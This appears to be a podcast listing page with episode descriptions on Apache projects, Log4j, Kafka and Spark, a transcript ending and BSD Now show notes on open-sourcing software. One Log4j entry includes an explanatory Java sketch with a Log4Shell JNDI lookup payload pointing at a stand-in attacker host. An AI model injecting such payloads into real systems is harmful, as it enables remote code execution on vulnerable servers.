Andi: Follow me on LinkedIn. I tend to post quite a bit on LinkedIn, I still post a bit on Twitter, but frankly, I've moved more of my activity to LinkedIn now. I find it's—

Corey: That is such a good decision. I envy you.

Andi: It's a more curated [laugh], you know, audience and so on. And then also, you know, we just had Google Cloud Next. I recorded a session there that kind of talks about databases and just some of the things that are new in database-land at Google Cloud. So, that's another thing: if folks are interested in more information, that may be something that could be appealing to you.

Corey: We will, of course, put links to all of this in the [show notes 00:34:03]. Thank you so much for your time. I really appreciate it.

Andi: Great. Corey, thanks so much for having me.

Corey: Andi Gutmans, VP and GM of Databases at Google Cloud. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry, insulting comment, and then I'm going to collect all of those angry, insulting comments and use them as a database.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Announcer: This has been a HumblePod production. Stay humble.

Groovy Podcast
Groovy Podcast, Episode 88 (S06E03)

Groovy Podcast

Play Episode Listen Later Oct 9, 2022 38:33


Groovy Podcast, Episode 88 (S06E03), from ApacheCon in New Orleans, LA. Ken Kousen, Paul King, Zach Klein, and Puneet Behl talk about the Groovy / Grails / Micronaut talks at the Apache Software Foundation's open source conference, October 2022.

The New Stack Podcast
The AWS Open Source Strategy

The New Stack Podcast

Play Episode Listen Later Oct 5, 2022 14:24


Amazon Web Services would not be what it is today without open source. "I think it starts with sustainability," said David Nalley, head of open source and marketing at AWS, in an interview at the Open Source Summit in Dublin for The New Stack Makers. "And this really goes back to the origin of Amazon Web Services. AWS would not be what it is today without open source." Long-term support for open source is one of three pillars of the organization's open source strategy. AWS builds and innovates on top of open source and will maintain that approach for its innovation, customers, and the larger digital economy. "And that means that there's a long history of us benefiting from open source and investing in open source," Nalley said. "But ultimately, we're here for the long haul. We're going to continue making investments. We're going to increase our investments in open source." Customers' interest in open source is the second pillar of the AWS open source strategy. "We feel like we have to make investments on behalf of our customers," Nalley said. "But the reality is our customers are choosing open source to run their workloads on." The third pillar focuses on advocating for open source in the larger digital economy. Notable is how much AWS's presence in the market played a part in Paul Vixie's decision to join the company. Vixie, an Internet pioneer, is now vice president of security and an AWS distinguished engineer who was also interviewed for the New Stack Makers podcast at the Open Source Summit. Nalley himself is a recognizable figure in the community: he is the president of the Apache Software Foundation, one of the world's most essential open source foundations. The importance of the three-pillar strategy shows in many of the projects that AWS supports. AWS recently donated $10 million to the Open Source Software Supply Chain Foundation, part of the Linux Foundation. AWS is a significant supporter of the Rust Foundation, which supports the Rust programming language and ecosystem. It puts a particular focus on the maintainers that govern the project. Last month, Facebook unveiled the PyTorch Foundation, which the Linux Foundation will manage. AWS is on the governing board.

TechCrunch Startups – Spoken Edition
With $17M in funding, Immerok launches cloud service for real-time streaming data

TechCrunch Startups – Spoken Edition

Play Episode Listen Later Oct 3, 2022 4:05


In 2011, the Apache Software Foundation released Flink, a high-throughput, low-latency engine for streaming various data types.


Word Notes
Encore: Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later Jul 5, 2022 8:46


An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information.  CyberWire Glossary link: https://thecyberwire.com/glossary/log4j Audio reference link: “CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Agency Director), YouTube, 20 December 2021.
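(For context on what the tool actually does, here is a minimal usage sketch; it assumes the log4j-api and log4j-core jars are on the classpath, and the class name and messages are made up for illustration.)

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoggingSketch {
    // One logger per class is the conventional pattern.
    private static final Logger logger = LogManager.getLogger(LoggingSketch.class);

    public static void main(String[] args) {
        // Parameterized messages: Log4j substitutes the {} placeholders.
        logger.info("Service started on port {}", 8080);
        logger.warn("Cache miss rate above {} percent", 90);
        logger.error("Could not open configuration file");
    }
}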

FINOS Open Source in Fintech Podcast
Mission Critical Data, and Evaluating the Community in OSS Tech - Mick Semb Wever, The Apache Software Foundation

FINOS Open Source in Fintech Podcast

Play Episode Listen Later Jun 28, 2022 18:40


In this episode of the podcast, Grizz sits down with Mick Semb Wever, Principal Architect on The Apache Software Foundation's Apache Cassandra project and Principal Architect at DataStax, working in Professional Services. We talk about "Mission Critical Data, and Evaluating the Community in OSS Tech". Plus, we discuss whether open source is up to the challenge of the continuous delivery needed to keep up with the financial services industry, how FSI companies can spend more time and resources on open source, and more. Mick's OSFF Talk - July 13 London: https://sched.co/13tCJ LinkedIn: https://www.linkedin.com/in/mick-semb-wever-91748720/ OSFF REGISTRATION IS OPEN FOR LONDON (13 JULY 22) (FINOS Members attend for FREEEEEE.... - osff@finos.org for more details) Open Source in Finance Forum London - https://events.linuxfoundation.org/open-source-finance-forum/ OSFF New York Call for Proposals - https://events.linuxfoundation.org/open-source-finance-forum-new-york/program/cfp/ Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org

Orchestrate all the Things podcast: Connecting the Dots with George Anadiotis
Evaluating the streaming data ecosystem: StreamNative releases benchmark comparing Apache Pulsar to Apache Kafka. Featuring Chief Architect & Head of Cloud Engineering Addison Higham

Orchestrate all the Things podcast: Connecting the Dots with George Anadiotis

Play Episode Listen Later Apr 7, 2022 30:23


Processing data in real-time is on the rise. The streaming analytics market (which, depending on definitions, may just be one segment of the streaming data market) is projected to grow from $15.4 billion in 2021 to $50.1 billion in 2026, at a Compound Annual Growth Rate (CAGR) of 26.5% during the forecast period, as per Markets and Markets. A multitude of streaming data alternatives, each with its own focus and approach, has emerged in the last few years. One of those alternatives is Apache Pulsar. In 2021, Pulsar ranked as a Top 5 Apache Software Foundation project and surpassed Apache Kafka in monthly active contributors. In another episode in the data streaming saga, StreamNative just released a report comparing Apache Pulsar to Apache Kafka in terms of performance benchmarks. We caught up with StreamNative Chief Architect & Head of Cloud Engineering Addison Higham to discuss the report's findings, as well as the bigger picture in data streaming. Article published on VentureBeat

USB our Guest Flash Briefing
Log4shell, Log4j exploit or Log4what, is that a new crossfit trend?

USB our Guest Flash Briefing

Play Episode Listen Later Feb 19, 2022 6:10


Today's episode covers the vulnerability affecting the Java logging package Log4j. This episode took a little longer to make than expected due to its complexity. Please see the links below, used to create the episode. TryHackMe's Solar, exploiting log4j https://tryhackme.com/room/solar The Log4J Vulnerability Will Haunt the Internet for Years https://www.wired.com/story/log4j-log4shell/ Huntress Log4Shell Vulnerability Tester https://log4shell.huntress.com/ Apache logging services https://logging.apache.org/ The Apache Software Foundation https://www.apache.org/ USB our Guest - Episode 22 Updates - https://anchor.fm/usbog/episodes/Software-Updates-emgnsh Log4j Attack surface - https://github.com/YfryTchsGD/Log4jAttackSurface Log4j - Apache Log4j Security Vulnerabilities - https://logging.apache.org/log4j/2.x/security.html JDBC Appender https://logging.apache.org/log4j/2.x/manual/appenders.html#JDBCAppender Apache Log4j Security Vulnerabilities https://logging.apache.org/log4j/2.x/security.html What is JDBC? https://www.ibm.com/docs/en/informix-servers/12.10?topic=started-what-is-jdbc Lesson: Overview of JNDI https://docs.oracle.com/javase/tutorial/jndi/overview/index.html W3C - Addressing https://www.w3.org/Addressing/URL/uri-spec.html Amazon Affiliate link - https://amzn.to/3rpF5KI --- Send in a voice message: https://anchor.fm/usbog/message
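(To connect the JNDI links above to the vulnerability itself, here is a hedged sketch of the vulnerable pattern; the attacker URL and class name are made up for illustration, and the behavior described applies to Log4j 2 versions before the 2.15.0 fix.)

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4ShellSketch {
    private static final Logger logger = LogManager.getLogger(Log4ShellSketch.class);

    public static void main(String[] args) {
        // Hypothetical attacker-controlled input, e.g. an HTTP User-Agent header.
        String userAgent = "${jndi:ldap://attacker.example/a}";

        // On vulnerable versions, formatting this message evaluated the ${jndi:...}
        // lookup, causing the JVM to contact the attacker's LDAP server, which could
        // hand back a reference to remotely loaded code.
        logger.info("Request from {}", userAgent);

        // Patched versions no longer resolve lookups in message text, so the same
        // call just logs the literal string.
    }
}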

Engenharia de Dados [Cast]
Is Apache Kafka a Relational Database?

Engenharia de Dados [Cast]

Play Episode Listen Later Feb 14, 2022 53:57


Apache Kafka is a data streaming platform capable of ingesting and processing millions of events per second. Even so, some points are important and usually don't get much explanation, such as:

Is Apache Kafka a database?
Transactions in Apache Kafka
Decoupled storage and processing
Comparing databases vs. Apache Kafka

This episode will once and for all demystify Apache Kafka and clear up all your questions about its strengths and weaknesses, and how you can get the best out of this open-source technology from the Apache Software Foundation. Luan Moreno = https://www.linkedin.com/in/luanmoreno/
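(Since transactions in Apache Kafka are one of the points listed above, here is a minimal sketch of the transactional producer API; the broker address, topics, and transactional.id are made up for illustration.)

import java.util.Properties;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;

public class KafkaTxSketch {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "localhost:9092");
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        // Setting a transactional.id enables atomic, exactly-once writes.
        props.put("transactional.id", "orders-tx-1");

        try (KafkaProducer<String, String> producer = new KafkaProducer<>(props)) {
            producer.initTransactions();
            producer.beginTransaction();
            producer.send(new ProducerRecord<>("orders", "order-42", "created"));
            producer.send(new ProducerRecord<>("audit", "order-42", "created"));
            // Both records become visible to read-committed consumers atomically.
            producer.commitTransaction();
        }
    }
}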

Sotto Attacco | Cybersecurity
The nuclear apocalypse of the web

Sotto Attacco | Cybersecurity

Play Episode Listen Later Feb 14, 2022 14:05


On November 24, 2021, a worldwide alarm spreads. All it takes is a simple message, traveling from Hangzhou, China, to Forest Hill, Maryland, USA. That's where John lives: a typical average American, an IT specialist, on his way to work at the Apache Software Foundation. At the office he opens his laptop, checks his email, and sees a message. That message. John reads it and learns that the Chinese engineers at Alibaba - the senders - have discovered a flaw in a library, Log4j. It is an extremely widely used open-source tool, written in the Java language right where he works. The Chinese inform him that they discovered it in Minecraft, the best-selling video game in the world. It is a vulnerability named Log4Shell. John reads on and understands that the problem is serious. Very serious. Some call it the nuclear apocalypse of the web. But why is it called that, Log4j? Why is it so devastating? Enjoy the episode!

Radio IT
SOPHOS - The nuclear apocalypse of the web

Radio IT

Play Episode Listen Later Feb 14, 2022 14:06


On November 24, 2021, a worldwide alarm spreads. All it takes is a simple message, traveling from Hangzhou, China, to Forest Hill, Maryland, USA. That's where John lives: a typical average American, an IT specialist, on his way to work at the Apache Software Foundation. At the office he opens his laptop, checks his email, and sees a message. That message. John reads it and learns that the Chinese engineers at Alibaba - the senders - have discovered a flaw in a library, Log4j. It is an extremely widely used open-source tool, written in the Java language right where he works. The Chinese inform him that they discovered it in Minecraft, the best-selling video game in the world. It is a vulnerability named Log4Shell. John reads on and understands that the problem is serious. Very serious. Some call it the nuclear apocalypse of the web. But why is it called that, Log4j? Why is it so devastating?

Risky Business
Risky Business #651 -- Russia's ransomware diplomacy

Risky Business

Play Episode Listen Later Jan 19, 2022


On this week's show Patrick Gray, Adam Boileau and Dmitri Alperovitch discuss the week's security news, including:

Russia arrests REvil crew
Ukraine government hit in messy hacks
White House hosts open source pow-wow, but is it pointless?
US cyber reporting law will come back from the dead
Report: Israeli police targeted activists with NSO but without warrants
Much, much more

This week's sponsor interview is with HD Moore, the founder of Rumble. We're talking through how he and his team helped customers respond to the Log4j drama. They quickly added the capability to scan customers' environments for Log4Shell-affected tech. When asset discovery meets rapid vuln response!

Links to everything that we discussed are below and you can follow Patrick, Dmitri or Adam on Twitter if that's your thing.

Show notes

Russia arrests ransomware gang responsible for high-profile cyberattacks
Celebrations over REvil ransomware arrests in Russia may be premature | The Daily Swig
Ransomware gang behind attacks on 50 companies arrested in Ukraine - The Record by Recorded Future
Europol takes down VPNLab, a service used by ransomware gangs - The Record by Recorded Future
Albuquerque schools are having a cybersecurity snow day—and they aren't alone - The Record by Recorded Future
What We Know and Don't Know about the Cyberattacks Against Ukraine - (updated)
Dozens of Computers in Ukraine Wiped with Destructive Malware in Coordinated Attack
Belarus: Cyber upstart, or Russian staging ground?
White House hosts open-source software security summit in light of expansive Log4j flaw
Apache Software Foundation warns its patching efforts are being undercut by use of end-of-life software | The Daily Swig
GitLab shifts left to patch high-impact vulnerabilities | The Daily Swig
Cyber incident reporting backers pledge to resume push - The Record by Recorded Future
Israeli police used spyware to hack its own citizens, a report says : NPR
El Salvador journalists hacked with NSO's Pegasus spyware - The Record by Recorded Future
Cyber Command ties hacking group to Iranian intelligence - The Record by Recorded Future
Earth Lusca threat actor targets governments and cryptocurrency companies alike - The Record by Recorded Future
North Korea stole a record $400 million in cryptocurrency last year, researchers say
Crypto.com Says Alleged $15 Million Hack Was Just an 'Incident'
Who is the Network Access Broker ‘Wazawaka?' – Krebs on Security
New Chrome security measure aims to curtail an entire class of Web attack | Ars Technica
EA blames support staff for recent hacks of high-profile FIFA accounts - The Record by Recorded Future
Researchers discover ‘extremely easy' 2FA bypass in Box cloud management software | The Daily Swig
Introducing vAPI – an open source lab environment to learn about API security | The Daily Swig

More In Common Podcast
Genius is Not Perfect /// Ben and Fitz /// EP146:Part2

More In Common Podcast

Play Episode Listen Later Jan 13, 2022 28:49


No matter how much effort you put into something, it's never done alone. This applies to everyone, including the smartest or most athletic. A genius doesn't create without supplies, funding, or assistance to contribute to their field of study, just as an athlete doesn't get to show their skills if the structure of sport doesn't exist. This is highlighted by Ben and Fitz in this Part 2 episode of their conversation. They talk about the Genius Myth and the importance of recognizing it when building highly collaborative and effective teams.

///

Brian (Fitz) is the Founder and CTO of Tock, and he started Google's Chicago engineering office in 2005. An open-source contributor for over 13 years, Brian was the engineering manager for several Google products, and is a member of the Apache Software Foundation, a former engineer at Apple and CollabNet, and a Subversion developer.

Ben is a co-founder & author of Subversion, a popular version-control tool to help programmers collaborate. He also co-authored the main O'Reilly manual for the software. He is currently the engineering Site Lead for Google's Chicago office, having joined Google in 2005 as one of the first two engineers in Chicago. He manages multiple teams working on Google's Search-serving infrastructure.

Together they have collaborated on multiple talks and books regarding the social challenges of software development. They have given dozens of talks at conferences (many viewable on YouTube), and authored a popular O'Reilly book on the subject: Debugging Teams: Better Productivity through Collaboration.

///

Topics we discuss:

Privilege
The relative nature of privilege
Seeing privilege
Their Book - Debugging Teams
Genius Myth
Working together in a creative space
Peter Principle
Understanding others
Pursue what makes sense for each

References:
ORD Camp
Crucial Conversations
H.A.L.T. - Hungry, Angry, Lonely, Tired
Free Book - Debugging Teams
Nikola Tesla and Thomas Edison
Peter Principle

Credits:

Music: Main Theme: "Eaze Does It" by Shye Eaze and DJ Rufbeats, a More In Common Podcast Exclusive. All music created by DJ Rufbeats

Word Notes
Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later Jan 11, 2022 8:46


An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information. 

GreyBeards on Storage
123: GreyBeards talk data analytics with Sean Owen, Apache Spark committer/PMC member & Databricks lead data scientist

GreyBeards on Storage

Play Episode Listen Later Sep 14, 2021 43:33


The GreyBeards move up the stack this month with a talk on big data and data analytics with Sean Owen (@sean_r_owen), Data Science lead at Databricks and Apache Spark committer and PMC member. The focus of the talk was on Apache Spark. Spark is an Apache Software Foundation open-source data analytics project and has been …
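(For a flavor of what running Spark looks like, here is a minimal sketch using the Java API; the input file and column name are made up for illustration.)

import org.apache.spark.sql.Dataset;
import org.apache.spark.sql.Row;
import org.apache.spark.sql.SparkSession;

public class SparkSketch {
    public static void main(String[] args) {
        // Run locally across all cores; on a cluster, the master URL changes.
        SparkSession spark = SparkSession.builder()
                .appName("spark-sketch")
                .master("local[*]")
                .getOrCreate();

        Dataset<Row> events = spark.read().option("header", "true").csv("events.csv");
        events.groupBy("event_type").count().show(); // simple distributed aggregation
        spark.stop();
    }
}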

AWS Developers Podcast
Episode 002 - Open Source with David Nalley

AWS Developers Podcast

Play Episode Listen Later Jun 8, 2021 26:10


In this episode Dave and Emily talk to David Nalley, a Principal Advocate at AWS for Open Source, and President of the Apache Software Foundation. David has been involved in open-source projects for decades, and humbly shares the lessons he has learned. David Nalley on Twitter: twitter.com/ke4qqq Apache Software Foundation on Twitter: https://twitter.com/TheASF Innovating with Rust: https://aws.amazon.com/blogs/opensource/innovating-with-rust/ Connect with Us on Twitter: Emily on Twitter: twitter.com/editingemily Dave on Twitter: twitter.com/thedavedev

Recruiting is a Cluster
Episode 1 - Philip Gollucci

Recruiting is a Cluster

Play Episode Listen Later Sep 26, 2020 51:32


Philip Gollucci, former VP of Infrastructure at the Apache Software Foundation, joins the Recruiting is a Cluster podcast to share a must-listen story about a six-stage interview process for a Data Scientist. He was asked to conduct the final interview and technical screen where a candidate used a “ringer.” Listen to the hilarity that ensues as the actual candidate shows up for their first day and cannot use basic Microsoft Office products. Philip shares his thoughts on improving the overall hiring process and preventing mistakes like this from happening in the future. You do not want to miss this absurd story, or the valuable advice he shares on recruiting top-tier technical talent. To contact Adrian Russo: adrian@recruitlocator.com To contact Philip Gollucci: pgollucci@p6m7g8.com RecruitLocator: https://www.recruitlocator.com AWS CDK: https://cdk.dev Lucky Dog Animal Rescue: https://www.luckydoganimalrescue.org/home

The History of Computing
The Apache Web Server

The History of Computing

Play Episode Listen Later Oct 29, 2019 12:52


Welcome to the History of Computing Podcast, where we explore the history of information technology. Because understanding the past prepares us for the innovations of the future! Today we're going to cover one of the most important and widely distributed server platforms ever: the Apache Web Server.

Today, Apache servers account for around 44% of the 1.7 billion web sites on the Internet. But at one point it was zero. And, this is crazy, that's down from over 70% in 2010. Tim Berners-Lee had put the first website up in 1991, and what we now know as the web was slowly growing. Our story begins in 1994 with the National Center for Supercomputing Applications (NCSA) at the University of Illinois, Urbana-Champaign, where Rob McCool had written the NCSA HTTPd web server. Yup, NCSA is also the organization that gave us NCSA Telnet and Mosaic, the web browser that would evolve into Netscape.

After Rob left NCSA, the HTTP daemon went a little, um, dormant in development. The code had forked, and the extensions and bug fixes needed to get merged into a common distribution. Apache is the free and open source web server that grew out of that code, initially created by Robert McCool and written in C, launching in 1995. McCool. You can't make that name up. I'd always pictured him as a cheetah wearing sunglasses. Who knew that he'd build a tool that would host half of the web sites in the world. A tool that would go on to be built into plenty of computers so they can spin up sharing services.

Times have changed since 1995. Originally the name was supposedly a cute one, referring to "a patchy server," given that it was based on lots of existing patches of craptastic code from NCSA. So it was initially based on NCSA HTTPd, whose influence is still alive and well all the way up to the configuration files. For example, on a Mac these are stored at /private/etc/apache2/httpd.conf.

The original Apache group consisted of:
* Brian Behlendorf
* Roy T. Fielding
* Rob Hartill
* David Robinson
* Cliff Skolnick
* Randy Terbush
* Robert S. Thau
* Andrew Wilson

And there were additional contributions from Eric Hagberg, Frank Peters, and Nicolas Pioch. Within a year of that first shipping, Apache had become the most popular web server on the internet.

The distributions and sites continued to grow to the point that the group formed the Apache Software Foundation, which would give financial, legal, and organizational support for Apache. They even started bringing other open source projects under that umbrella. Projects like Tomcat. And the distributions of Apache grew. mod_ssl, which brought the first SSL functionality to Apache 1.3, was released in 1998. And it grew. The Apache Foundation came in 1999 to make sure the project outlived the participants and to bring other tools under the umbrella. The first conference, ApacheCon, came in 2000. Douglas Adams was there. I was not. There were 17 million web sites at the time.

The number of web sites hosted on Apache servers continued to rise. Apache 2 was released in 2004. The number of web sites hosted on Apache servers continued to rise. By 2009, Apache was hosting over 100 million websites. By 2013, Apache had added that it was named "out of a respect for the Native American Indian tribe of Apache."

The history isn't the only thing that was rewritten. Apache itself was rewritten and is now distributed as Apache 2.0. There were over 670 million web sites by then. And we hit 1 billion sites in 2014. I can't help but wonder what percentage are collections of fart jokes. Probably not nearly enough. But an estimated 75% are inactive sites.
The job of a web server is to serve web pages on the internet. Those were initially flat HTML files but have gone on to include CGI, PHP, Python, Java, JavaScript, and others. A web browser is then used to interpret those files. It accesses the .html or .htm file (or one of the many other file types that now exist), opens a page, and then loads the text, images, and included files, and processes any scripts. Both use the HTTP protocol; thus the URL begins with http, or https if the site is being hosted over SSL. Apache is responsible for providing the access to those pages over that protocol.

The way the scripts are interpreted is through mods. These include mod_php, mod_python, mod_perl, etc. The modular nature of Apache makes it infinitely extensible. OK, maybe not infinitely. Nothing's really infinite. But the loadable dynamic modules do make the system more extensible. For example, you can easily get TLS/SSL using mod_ssl. The great thing about Apache and its mods is that anyone can adapt the server for generic uses, and they allow you to get into some really specific needs. And the server, as well as each of those mods, has its source code available on the Interwebs. So if it doesn't do exactly what you want, you can conform the server to your specific needs. For example, if you wanna' hate life, there's a mod for FTP.

Out of the box, Apache logs connections, includes a generic expression parser, supports WebDAV and CGI, can support embedded Perl, PHP, and Lua scripting, can be configured for public_html per-user web pages, supports .htaccess to limit access to various directories as one of a few authorization access controls, and allows for very in-depth custom logging and log rotation. Those logs include things like the name and IP address of a host as well as geolocations. It can rewrite headers, URLs, and content. It's also simple to enable proxies.

Apache, along with Linux, MySQL, and PHP, became so popular that the term LAMP was coined, short for those products. The prevalence allowed the web development community to build hundreds or thousands of tools on top of Apache through the 90s and 2000s, including popular Content Management Systems, or CMS for short, such as WordPress, Mambo, and Joomla. Other capabilities include:
* Auto-indexing and content negotiation
* Reverse proxy with caching
* Multiple load balancing mechanisms
* Fault tolerance and failover with automatic recovery
* WebSocket, FastCGI, SCGI, AJP and uWSGI support with caching
* Dynamic configuration
* Name- and IP address-based virtual servers
* gzip compression and decompression
* Server Side Includes
* User and session tracking
* Generic expression parser
* Real-time status views
* XML support

Today we have several web servers to choose from. Engine-X, spelled Nginx, is a newer web server that was initially released in 2004. Apache uses a thread per connection and so can only process the number of threads available; by default 10,000 in Linux and macOS. NGINX doesn't use threads, so it can scale differently, and is used by companies like AirBNB, Hulu, Netflix, and Pinterest. That 10,000 limit is easily controlled using concurrent connection limiting, request processing rate limiting, or bandwidth throttling. You can also scale with some serious load balancing and in-band health checks or with one of the many load balancing options. Having said that, Baidu.com, Apple.com, Adobe.com, and PayPal.com - all Apache. We also have other web servers provided by cloud services like Cloudflare and Google slowly increasing in popularity.
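To make the mods and per-directory controls above concrete, here is a minimal configuration sketch in the httpd.conf style mentioned earlier; the domain, file paths, and module choices are made up for illustration and assume an Apache 2.4-era setup.

# Modules are how optional functionality gets loaded.
LoadModule ssl_module modules/mod_ssl.so
LoadModule rewrite_module modules/mod_rewrite.so

<VirtualHost *:443>
    ServerName www.example.com
    DocumentRoot "/var/www/example"

    # TLS/SSL via mod_ssl, as described above.
    SSLEngine on
    SSLCertificateFile "/etc/ssl/certs/example.crt"
    SSLCertificateKeyFile "/etc/ssl/private/example.key"

    # Per-directory access control; AllowOverride lets .htaccess files
    # add their own authorization rules.
    <Directory "/var/www/example">
        AllowOverride AuthConfig
        Require all granted
    </Directory>

    CustomLog "/var/log/httpd/example_access.log" combined
</VirtualHost>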
Tomcat is another web server. But Tomcat is almost exclusively used to run various Java servers, servlets, EL, websockets, etc. Today, each of the open source projects under the Apache Foundation has a Project Management Committee. These provide direction and management of the projects. New members are added when someone who contributes a lot to the project gets nominated to be a contributor, and then a vote is held requiring unanimous support. Commits require three yes votes with no no votes. It's all ridiculously efficient in a very open source hacker kinda' way.

The Apache server's impact on the open-source software community has been profound. It is partly explained by the unique license from the Apache Software Foundation. The license was in fact written to protect the creators of Apache while giving access to the source code for others to hack away at it. The Apache License 1.1 was approved in 2000 and removed the requirement to attribute the use of the license in advertisements of software. Version two of the license came in 2004, which made the license easier to use for projects that weren't from the Apache Foundation. This made it easier for GPL compatibility, and allowed using a reference for the whole project rather than attributing software in every file.

The open source nature of Apache was critical to the growth of the web as we know it today. There were other projects to build web servers, for sure. Heck, there were other protocols, like Gopher. But many died because of stringent licensing policies. Gopher did great until the University of Minnesota decided to charge for it. Then everyone realized it didn't have nearly as good of graphics as the web.

Today the web is one of the single largest growth engines of the global economy. And much of that is owed to Apache. So thanks Apache, for helping us to alleviate a little of the suffering of the human condition for all creatures of the world. By the way, did you know you can buy hamster wheels on the web? Or cat food. Or flea meds for the dog. Speaking of which, I better get back to my chores. Thanks for taking time out of your busy schedule to listen! You should probably get to your chores as well though. Sorry if I got you in trouble. But hey, thanks for tuning in to another episode of the History of Computing Podcast. We're lucky to have you. Have a great day!

Drill to Detail
Drill to Detail Ep.44 'Pandas, Apache Arrow and In-Memory Analytics' With Special Guest Wes McKinney

Drill to Detail

Play Episode Listen Later Dec 8, 2017 46:31


Mark is joined in this episode of Drill to Detail by Wes McKinney to talk about the origins of the Python pandas open-source package for data analysis, his subsequent work as a contributor to the Kudu (incubating) and Parquet projects within the Apache Software Foundation, and Arrow, an in-memory data structure specification for use by engineers building data systems and the de facto standard for columnar in-memory processing and interchange.

BSD Now
214: The history of man, kind

BSD Now

Play Episode Listen Later Oct 4, 2017 90:20


The costs of open sourcing a project are explored, we discover why PS4 downloads are so slow, delve into the history of UNIX man pages, and more.

This episode was brought to you by

Headlines

The Cost Of Open Sourcing Your Project (https://meshedinsights.com/2016/09/20/open-source-unlikely-to-be-abandonware/)

Accusing a company of “dumping” their project as open source is probably misplaced – it's an expensive business no-one would do frivolously. If you see an active move to change software licensing or governance, it's likely someone is paying for it and thus could justify the expense to an executive.

A Little History

Some case study cameos may help. From 2004 onwards, Sun Microsystems had a policy of all its software moving to open source. The company migrated almost all products to open source licenses, and had varying degrees of success engaging communities around the various projects, largely related to the outlooks of the product management and Sun developers for the project.

Sun occasionally received requests to make older, retired products open source. For example, Sun acquired a company called Lighthouse Design which created a respected suite of office productivity software for Steve Jobs' NeXT platform. Strategy changes meant that software headed for the vault (while Jonathan Schwartz, a founder of Lighthouse, headed for the executive suite). Members of the public asked if Sun would open source some of this software, but these requests were declined because there was no business unit willing to fund the move.

When Sun was later bought by Oracle, a number of those projects that had been made open source were abandoned. “Abandoning” software doesn't mean leaving it for others; it means simply walking away from wherever you left it. In the case of Sun's popular identity middleware products, that meant Oracle let the staff go and tried to migrate customers to other products, while remaining silent in public on the future of the project. But the code was already open source, so the user community was able to pick up the pieces and carry on, with help from Forgerock.

It costs a lot of money to open source a mature piece of commercial software, even if all you are doing is “throwing a tarball over the wall”. That's why companies abandoning software they no longer care about so rarely make it open source, and those abandoning open source projects rarely move them to new homes that benefit others. If all you have thought about is the eventual outcome, you may be surprised how expensive it is to get there. Costs include:

For throwing a tarball over the wall:

Legal clearance. Having the right to use the software is not the same as giving everyone in the world an unrestricted right to use it and create derivatives. Checking every line of code to make sure you have the rights necessary to release under an OSI-approved license is a big task requiring high-value employees on the “liberation team”. That includes both developers and lawyers; neither come cheap.

Repackaging. To pass it to others, a self-contained package containing all necessary source code, build scripts and non-public source and tool dependencies has to be created since it is quite unlikely to exist internally. Again, the liberation team will need your best developers.

Preserving provenance. Just because you have confidence that you have the rights to the code, that doesn't mean anyone else will.
The version control system probably contains much of the information that gives confidence about who wrote which code, so the repackaging needs to also include a way to migrate the commit information.

Code cleaning. The file headers will hopefully include origin information, but the liberation team had better check. They also need to check the comments for libel and profanities, not to mention trade secrets (especially those from third parties) and other IP issues.

For a sustainable project, all the above plus:

Compliance with host governance. It is a fantastic idea to move your project to a host like Apache, Conservancy, Public Software and so on. But doing so requires preparatory work. As a minimum you will need to negotiate with the new host organisation, and they may well need you to satisfy their process requirements. Paperwork obviously, but also the code may need conforming copyright statements and more. That's more work for your liberation team.

Migration of rights. Your code has an existing community who will need to migrate to your new host. That includes your staff – they are community too! They will need commit rights, governance rights, social media rights and more. Your liberation team will need your community manager, obviously, but may also need HR input.

Endowment. Keeping your project alive will take money. It's all been coming from you up to this point, but if you simply walk away before the financial burden has been accepted by the new community and hosts there may be a problem. You should consider making an endowment to your new host to pay for their migration costs plus the cost of hosting the community for at least a year.

Marketing. Explaining the move you are making, the reasons why you are making it and the benefits for you and the community is important. If you don't do it, there are plenty of trolls around who will do it for you. Creating a news blog post and an FAQ — the minimum effort necessary — really does take someone experienced and you'll want to add such a person to your liberation team.

Motivations

There has to be some commercial reason that makes the time, effort and thus expense worth incurring. Some examples of motivations include:

Market Strategy. An increasing number of companies are choosing to create substantial, openly-governed open source communities around software that contributes to their business. An open multi-stakeholder co-developer community is an excellent vehicle for innovation at the lowest cost to all involved. As long as your market strategy doesn't require creating artificial scarcity.

Contract with a third party. While the owner of the code may no longer be interested, there may be one or more parties to which they owe a contractual responsibility. Rather than breaching that contract, or buying it out, a move to open source may be better. Some sources suggest a contractual obligation to IBM was the reason Oracle abandoned OpenOffice.org by moving it over to the Apache Software Foundation, for example.

Larger dependent ecosystem. You may have no further use for the code itself, but you may well have other parts of your business which depend on it. If they are willing to collectively fund development you might consider an “inner source” strategy which will save you many of the costs above. But the best way to proceed may well be to open the code so your teams and those in other companies can fund the code.

Internal politics.
From the outside, corporations look monolithic, but from the inside it becomes clear they are a microcosm of the market in which they exist. As a result, they have political machinations that may be addressed by open source. One of Oracle's motivations for moving NetBeans to Apache seems to have been political. Despite multiple internal groups needing it to exist, the code was not generating enough direct revenue to satisfy successive executive owners, who allegedly tried to abandon it on more than one occasion. Donating it to Apache meant that couldn't happen again.

None of this is to say a move to open source guarantees the success of a project. A “Field of Dreams” strategy only works in the movies, after all. But while it may be tempting to look at a failed corporate liberation and describe it as “abandonware”, chances are it was intended as nothing of the kind.

Why PS4 downloads are so slow (https://www.snellman.net/blog/archive/2017-08-19-slow-ps4-downloads/)

